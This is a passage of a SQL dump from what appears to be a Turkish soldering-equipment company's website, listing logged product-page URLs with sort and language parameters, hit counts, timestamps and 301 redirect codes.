00:00:00',301),(41719,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,`p`.product_sku?language=en-gb',NULL,'','',3,0,'2025-06-28 20:58:50','0000-00-00 00:00:00',301),(41720,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,category_name',NULL,'','',3,0,'2025-06-28 20:58:53','0000-00-00 00:00:00',301),(41721,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/e-bar-26-detail',NULL,'','',1,0,'2025-06-28 20:58:56','0000-00-00 00:00:00',301),(41722,'https://3s-technologies.com.tr/index.php/en/products/?tmpl=component',NULL,'','',2,0,'2025-06-28 20:59:00','0000-00-00 00:00:00',301),(41723,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/e-bar-detail',NULL,'','',1,0,'2025-06-28 20:59:03','0000-00-00 00:00:00',301),(41724,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme',NULL,'','',1,0,'2025-06-28 20:59:12','0000-00-00 00:00:00',301),(41725,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme/by,`p`.product_sku',NULL,'','',1,0,'2025-06-28 20:59:16','0000-00-00 00:00:00',301),(41726,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-28 20:59:19','0000-00-00 00:00:00',301),(41727,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?language=tr-tr',NULL,'','',12,0,'2025-06-28 20:59:22','0000-00-00 00:00:00',301),(41728,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme/by,category_name',NULL,'','',1,0,'2025-06-28 20:59:29','0000-00-00 00:00:00',301),(41729,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-28 20:59:32','0000-00-00 00:00:00',301),(41730,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme/by,mf_name',NULL,'','',1,0,'2025-06-28 20:59:42','0000-00-00 00:00:00',301),(41731,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-28 20:59:45','0000-00-00 00:00:00',301),(41732,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme/by,ordering',NULL,'','',1,0,'2025-06-28 20:59:55','0000-00-00 00:00:00',301),(41733,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme/by,product_name',NULL,'','',1,0,'2025-06-28 21:00:01','0000-00-00 00:00:00',301),(41734,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-28 21:00:04','0000-00-00 00:00:00',301),(41735,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme/by,product_sku',NULL,'','',1,0,'2025-06-28 21:00:14','0000-00-00 00:00:00',301),(41736,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme/dirdesc',NULL,'','',1,0,'2025-06-28 21:00:21','0000-00-00 00:00:00',301),(41737,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme/ess-310-24-detail',NULL,'','',1,0,'2025-06-28 21:00:27','0000-00-00 00:00:00',301),(41738,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?tmpl=component',NULL,'','',2,0,'2025-06-28 21:00:30','0000-00-00 00:00:00',301),(41739,'https://3s-technologies.com.tr/index.php/tr/ueruenler/b?lgesel-lehimleme/ess-310-detail',NULL,'','',1,0,'2025-06-28 21:00:33','0000-00-00 00:00:00',301),(41740,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeldri/?ubuk-lehim',NULL,'','',1,0,'2025-06-28 21:00:43','0000-00-00 00:00:00',301),(41741,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim',NULL,'','',1,0,'2025-06-28 21:00:46','0000-00-00 00:00:00',301),(41742,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku',NULL,'','',1,0,'2025-06-28 21:00:49','0000-00-00 00:00:00',301),(41743,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-28 21:00:52','0000-00-00 00:00:00',301),(41744,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?language=tr-tr',NULL,'','',12,0,'2025-06-28 21:00:56','0000-00-00 00:00:00',301),(41745,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim/by,category_name',NULL,'','',1,0,'2025-06-28 21:01:02','0000-00-00 00:00:00',301),(41746,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-28 21:01:05','0000-00-00 00:00:00',301),(41747,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name',NULL,'','',1,0,'2025-06-28 21:01:15','0000-00-00 00:00:00',301),(41748,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-28 21:01:18','0000-00-00 00:00:00',301),(41749,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim/by,ordering',NULL,'','',1,0,'2025-06-28 21:01:28','0000-00-00 00:00:00',301),(41750,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim/by,product_name',NULL,'','',1,0,'2025-06-28 21:01:34','0000-00-00 00:00:00',301),(41751,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-28 21:01:37','0000-00-00 00:00:00',301),(41752,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim/by,product_sku',NULL,'','',1,0,'2025-06-28 21:01:47','0000-00-00 00:00:00',301),(41753,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim/dirdesc',NULL,'','',1,0,'2025-06-28 21:01:53','0000-00-00 00:00:00',301),(41754,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim/e-bar-26-detail',NULL,'','',1,0,'2025-06-28 21:02:00','0000-00-00 00:00:00',301),(41755,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?tmpl=component',NULL,'','',2,0,'2025-06-28 21:02:03','0000-00-00 00:00:00',301),(41756,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/?ubuk-lehim/e-bar-detail',NULL,'','',1,0,'2025-06-28 21:02:06','0000-00-00 00:00:00',301),(41757,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n',NULL,'','',1,0,'2025-06-28 21:02:16','0000-00-00 00:00:00',301),(41758,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,`p`.product_sku',NULL,'','',1,0,'2025-06-28 21:02:19','0000-00-00 00:00:00',301),(41759,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-28 21:02:22','0000-00-00 00:00:00',301),(41760,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-06-28 21:02:26','0000-00-00 00:00:00',301),(41761,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2025-06-28 21:02:29','0000-00-00 00:00:00',301),(41762,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,category_name',NULL,'','',1,0,'2025-06-28 21:02:32','0000-00-00 00:00:00',301),(41763,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-28 21:02:35','0000-00-00 00:00:00',301),(41764,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-06-28 21:02:38','0000-00-00 00:00:00',301),(41765,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,category_name?language=tr-tr',NULL,'','',1,0,'2025-06-28 21:02:42','0000-00-00 00:00:00',301),(41766,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,mf_name',NULL,'','',1,0,'2025-06-28 21:02:45','0000-00-00 00:00:00',301),(41767,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-28 21:02:48','0000-00-00 00:00:00',301),(41768,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-06-28 21:02:51','0000-00-00 00:00:00',301),(41769,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,mf_name?language=tr-tr',NULL,'','',1,0,'2025-06-28 21:02:54','0000-00-00 00:00:00',301),(41770,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_sku',NULL,'','',3,0,'2025-06-28 22:03:12','0000-00-00 00:00:00',301),(41771,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,product_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 22:04:37','0000-00-00 00:00:00',301),(41772,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,product_name?language=en-gb',NULL,'','',3,0,'2025-06-28 22:04:40','0000-00-00 00:00:00',301),(41773,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,product_sku',NULL,'','',3,0,'2025-06-28 22:04:43','0000-00-00 00:00:00',301),(41774,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,product_sku?language=en-gb',NULL,'','',3,0,'2025-06-28 22:04:47','0000-00-00 00:00:00',301),(41775,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/dirdesc',NULL,'','',3,0,'2025-06-28 22:04:50','0000-00-00 00:00:00',301),(41776,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 22:04:53','0000-00-00 00:00:00',301),(41777,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n?language=en-gb',NULL,'','',3,0,'2025-06-28 22:04:57','0000-00-00 00:00:00',301),(41778,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??',NULL,'','',3,0,'2025-06-28 22:05:00','0000-00-00 00:00:00',301),(41779,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,`p`.product_sku',NULL,'','',3,0,'2025-06-28 22:05:03','0000-00-00 00:00:00',301),(41780,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-28 22:05:06','0000-00-00 00:00:00',301),(41781,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 22:05:10','0000-00-00 00:00:00',301),(41782,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,`p`.product_sku?language=en-gb',NULL,'','',3,0,'2025-06-28 22:05:13','0000-00-00 00:00:00',301),(41783,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,category_name',NULL,'','',3,0,'2025-06-28 22:05:16','0000-00-00 00:00:00',301),(41784,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-28 22:05:19','0000-00-00 00:00:00',301),(41785,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,category_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 22:05:23','0000-00-00 00:00:00',301),(41786,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,category_name?language=en-gb',NULL,'','',3,0,'2025-06-28 22:05:26','0000-00-00 00:00:00',301),(41787,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,mf_name',NULL,'','',3,0,'2025-06-28 22:05:29','0000-00-00 00:00:00',301),(41788,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-28 22:05:33','0000-00-00 00:00:00',301),(41789,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,mf_name/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 22:05:36','0000-00-00 00:00:00',301),(41790,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,mf_name?language=en-gb',NULL,'','',2,0,'2025-06-28 22:05:39','0000-00-00 00:00:00',301),(41791,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,ordering',NULL,'','',2,0,'2025-06-28 22:05:42','0000-00-00 00:00:00',301),(41792,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,ordering?language=en-gb',NULL,'','',2,0,'2025-06-28 22:05:46','0000-00-00 00:00:00',301),(41793,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,product_name',NULL,'','',2,0,'2025-06-28 22:05:49','0000-00-00 00:00:00',301),(41794,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-28 22:05:52','0000-00-00 00:00:00',301),(41795,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 22:05:55','0000-00-00 00:00:00',301),(41796,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,product_name?language=en-gb',NULL,'','',2,0,'2025-06-28 22:05:59','0000-00-00 00:00:00',301),(41797,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,product_sku',NULL,'','',2,0,'2025-06-28 22:06:02','0000-00-00 00:00:00',301),(41798,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/by,product_sku?language=en-gb',NULL,'','',2,0,'2025-06-28 22:06:05','0000-00-00 00:00:00',301),(41799,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/dirdesc',NULL,'','',2,0,'2025-06-28 22:06:09','0000-00-00 00:00:00',301),(41800,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h??/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 22:06:12','0000-00-00 00:00:00',301),(41801,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h???language=en-gb',NULL,'','',2,0,'2025-06-28 22:06:15','0000-00-00 00:00:00',301),(41802,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z',NULL,'','',3,0,'2025-06-28 22:06:18','0000-00-00 00:00:00',301),(41803,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',3,0,'2025-06-28 22:06:22','0000-00-00 00:00:00',301),(41804,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/cs40-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-28 22:06:28','0000-00-00 00:00:00',301),(41805,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,mf_name',NULL,'','',1,0,'2025-06-28 22:06:31','0000-00-00 00:00:00',301),(41806,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,ordering',NULL,'','',1,0,'2025-06-28 22:06:35','0000-00-00 00:00:00',301),(41807,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,ordering?language=tr-tr',NULL,'','',1,0,'2025-06-28 22:06:38','0000-00-00 00:00:00',301),(41808,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,product_name',NULL,'','',1,0,'2025-06-28 22:06:41','0000-00-00 00:00:00',301),(41809,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-28 22:06:45','0000-00-00 00:00:00',301),(41810,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-06-28 22:06:48','0000-00-00 00:00:00',301),(41811,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,product_name?language=tr-tr',NULL,'','',1,0,'2025-06-28 22:06:51','0000-00-00 00:00:00',301),(41812,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,product_sku',NULL,'','',1,0,'2025-06-28 22:06:54','0000-00-00 00:00:00',301),(41813,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/by,product_sku?language=tr-tr',NULL,'','',1,0,'2025-06-28 22:06:58','0000-00-00 00:00:00',301),(41814,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',3,0,'2025-06-28 22:45:16','0000-00-00 00:00:00',301),(41815,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/dirdesc',NULL,'','',2,0,'2025-06-28 22:47:25','0000-00-00 00:00:00',301),(41816,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n/dirdesc?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:47:28','0000-00-00 00:00:00',301),(41817,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-f??n?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:47:31','0000-00-00 00:00:00',301),(41818,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??',NULL,'','',2,0,'2025-06-28 22:47:35','0000-00-00 00:00:00',301),(41819,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,`p`.product_sku',NULL,'','',2,0,'2025-06-28 22:47:39','0000-00-00 00:00:00',301),(41820,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-28 22:47:43','0000-00-00 00:00:00',301),(41821,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:47:46','0000-00-00 00:00:00',301),(41822,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,`p`.product_sku?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:47:49','0000-00-00 00:00:00',301),(41823,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,category_name',NULL,'','',2,0,'2025-06-28 22:47:52','0000-00-00 00:00:00',301),(41824,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-28 22:47:56','0000-00-00 00:00:00',301),(41825,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,category_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:47:59','0000-00-00 00:00:00',301),(41826,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,category_name?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:48:03','0000-00-00 00:00:00',301),(41827,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,mf_name',NULL,'','',2,0,'2025-06-28 22:48:06','0000-00-00 00:00:00',301),(41828,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-28 22:48:10','0000-00-00 00:00:00',301),(41829,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,mf_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:48:14','0000-00-00 00:00:00',301),(41830,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,mf_name?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:48:50','0000-00-00 00:00:00',301),(41831,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,ordering',NULL,'','',2,0,'2025-06-28 22:48:53','0000-00-00 00:00:00',301),(41832,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,ordering?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:48:57','0000-00-00 00:00:00',301),(41833,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,product_name',NULL,'','',2,0,'2025-06-28 22:49:00','0000-00-00 00:00:00',301),(41834,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-28 22:49:03','0000-00-00 00:00:00',301),(41835,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,product_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:49:07','0000-00-00 00:00:00',301),(41836,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,product_name?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:49:10','0000-00-00 00:00:00',301),(41837,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,product_sku',NULL,'','',2,0,'2025-06-28 22:49:14','0000-00-00 00:00:00',301),(41838,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/by,product_sku?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:49:17','0000-00-00 00:00:00',301),(41839,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/dirdesc',NULL,'','',2,0,'2025-06-28 22:49:21','0000-00-00 00:00:00',301),(41840,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h??/dirdesc?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:49:24','0000-00-00 00:00:00',301),(41841,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h???language=tr-tr',NULL,'','',2,0,'2025-06-28 22:49:28','0000-00-00 00:00:00',301),(41842,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-h?z',NULL,'','',2,0,'2025-06-28 22:49:31','0000-00-00 00:00:00',301),(41843,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',2,0,'2025-06-28 22:49:36','0000-00-00 00:00:00',301),(41844,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-28 22:49:41','0000-00-00 00:00:00',301),(41845,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-h?z/by,category_name',NULL,'','',2,0,'2025-06-28 22:49:51','0000-00-00 00:00:00',301),(41846,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-28 22:49:54','0000-00-00 00:00:00',301),(41847,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-28 22:50:07','0000-00-00 00:00:00',301),(41848,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-28 22:50:28','0000-00-00 00:00:00',301),(41849,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-h?z/dirdesc',NULL,'','',2,0,'2025-06-28 22:50:46','0000-00-00 00:00:00',301),(41850,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??',NULL,'','',2,0,'2025-06-28 22:50:59','0000-00-00 00:00:00',301),(41851,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,`p`.product_sku',NULL,'','',2,0,'2025-06-28 22:51:02','0000-00-00 00:00:00',301),(41852,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-28 22:51:05','0000-00-00 00:00:00',301),(41853,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:51:09','0000-00-00 00:00:00',301),(41854,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,`p`.product_sku?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:51:12','0000-00-00 00:00:00',301),(41855,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,category_name',NULL,'','',2,0,'2025-06-28 22:51:16','0000-00-00 00:00:00',301),(41856,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-28 22:51:19','0000-00-00 00:00:00',301),(41857,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,category_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:51:22','0000-00-00 00:00:00',301),(41858,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,category_name?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:51:26','0000-00-00 00:00:00',301),(41859,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,mf_name',NULL,'','',2,0,'2025-06-28 22:51:29','0000-00-00 00:00:00',301),(41860,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-28 22:51:32','0000-00-00 00:00:00',301),(41861,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,mf_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:51:36','0000-00-00 00:00:00',301),(41862,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,mf_name?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:51:39','0000-00-00 00:00:00',301),(41863,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,ordering',NULL,'','',2,0,'2025-06-28 22:51:44','0000-00-00 00:00:00',301),(41864,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,ordering?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:51:48','0000-00-00 00:00:00',301),(41865,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,product_name',NULL,'','',2,0,'2025-06-28 22:51:51','0000-00-00 00:00:00',301),(41866,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-28 22:52:01','0000-00-00 00:00:00',301),(41867,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,product_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2025-06-28 22:52:06','0000-00-00 